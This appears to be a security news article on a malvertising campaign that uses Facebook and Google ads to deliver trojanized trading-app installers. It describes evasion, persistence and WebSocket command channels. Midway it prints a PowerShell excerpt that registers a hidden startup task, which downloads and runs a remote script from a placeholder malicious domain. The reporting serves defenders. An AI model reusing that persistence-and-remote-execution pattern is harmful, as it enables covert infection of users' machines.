In recent months, cybersecurity teams have observed an alarming trend in which malicious actors exploit Facebook and Google advertising channels to masquerade as legitimate financial services.
By promoting free or premium access to well-known trading platforms, these threat actors have successfully lured unsuspecting users into downloading trojanized applications.
The campaign’s social engineering tactics leverage familiar branding and verified badges, creating a veneer of authenticity that bypasses casual scrutiny.
Victims are redirected through paid ad placements toward obfuscated payloads designed to evade automated analysis and human review.
Initial infections typically begin with clicks on Facebook Ads promising “one-year free access” to premium charting tools.
Users are directed to landing pages that host customized service worker scripts, often encrypted with AES-CBC and loaded via StreamSaver.js to deliver a malicious installer under the guise of a legitimate executable.
Once downloaded, the oversized loader—sometimes over 700 MB—employs anti-sandbox checks, preventing execution in virtualized environments. Only upon passing these defenses does the downloader initiate its multi-stage process.
Bitdefender analysts noted that after breaching these initial defenses, the malware shifts to a WebSocket communication channel on port 30000, replacing the older HTTP-based approach used in previous campaigns.
The threat actors encrypted their front-end JavaScript, then deployed a deobfuscation routine at runtime to construct the final payload.
This dynamic approach foils most static analysis tools and significantly increases the complexity of forensic investigations.
A successful execution triggers the creation of a persistent Scheduled Task named EdgeResourcesInstallerV12-issg, which downloads and executes subsequent PowerShell scripts via Invoke-Expression.
This task not only ensures reinfection on system restart but also modifies Windows Defender settings to exclude its payload directories.
The following excerpt illustrates the Scheduled Task registration:-
$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "Invoke-Expression $(Invoke-WebRequest -UseBasicParsing https://malicious-domain.com/next.ps1)"'
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'EdgeResourcesInstallerV12-issg' -Description 'Windows Edge resources updater'Infection Mechanism
The infection mechanism centers on a sophisticated downloader component that leverages both service worker APIs and modern web tracking frameworks to blend malicious operations with legitimate analytics.
.webp)
By integrating PostHog for event tracking alongside third-party pixels such as Facebook Pixel, Google Ads Conversion Tracking, and Microsoft Ads Pixel, the front-end application gains visibility into user behavior.
This telemetry allows operators to selectively deploy malicious content only to high-value targets, serving benign pages to all others.
Once the user initiates a download, the service worker intercepts the request, decrypts and deobfuscates the payload, then streams the binary through StreamSaver.js to the file system—bypassing traditional browser download safeguards.
This seamless delivery mechanism, paired with domain rotation and language-specific ads, enables rapid, widespread propagation while maintaining a low profile.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
